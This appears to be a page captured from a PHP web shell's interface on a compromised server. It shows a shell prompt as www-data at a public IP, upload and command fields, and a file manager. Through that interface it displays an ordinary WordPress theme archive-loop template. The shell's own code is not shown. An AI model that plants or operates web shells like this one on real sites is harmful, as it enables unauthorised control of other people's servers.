[ Avaa Bypassed ]




Upload:

Command:

www-data@3.142.133.182: ~ $
<div class="post-listing archive-box">

<?php while ( have_posts() ) : the_post(); ?>

	<article <?php tie_post_class('item-list'); ?>>
	
		<h2 class="post-box-title">
			<a href="<?php the_permalink(); ?>"><?php the_title(); ?></a>
		</h2>
		
		<?php get_template_part( 'framework/parts/meta-archives' ); ?>					

		
		<?php if ( function_exists("has_post_thumbnail") && has_post_thumbnail() ) : ?>	
		
		<div class="post-thumbnail">
			<a href="<?php the_permalink(); ?>">
				<?php the_post_thumbnail('tie-medium');  ?>
				<span class="fa overlay-icon"></span>
			</a>
		</div><!-- post-thumbnail /-->
		
		<?php endif; ?>
			
		<div class="entry">
			<p><?php tie_excerpt() ?></p>
			<a class="more-link" href="<?php the_permalink() ?>"><?php _eti( 'Read More &raquo;' ) ?></a>
		</div>

		<?php if( tie_get_option( 'archives_socail' ) ) get_template_part( 'framework/parts/share' );  // Get Share Button template ?>
		
		<div class="clear"></div>
	</article><!-- .item-list -->
	
<?php endwhile;?>
</div>

Filemanager

Name Type Size Permission Actions
loop-content.php File 610 B 0664
loop-default.php File 1011 B 0664
loop-masonry.php File 1.79 KB 0664
loop-timeline.php File 1.63 KB 0664
loop-wide-featured.php File 1.02 KB 0664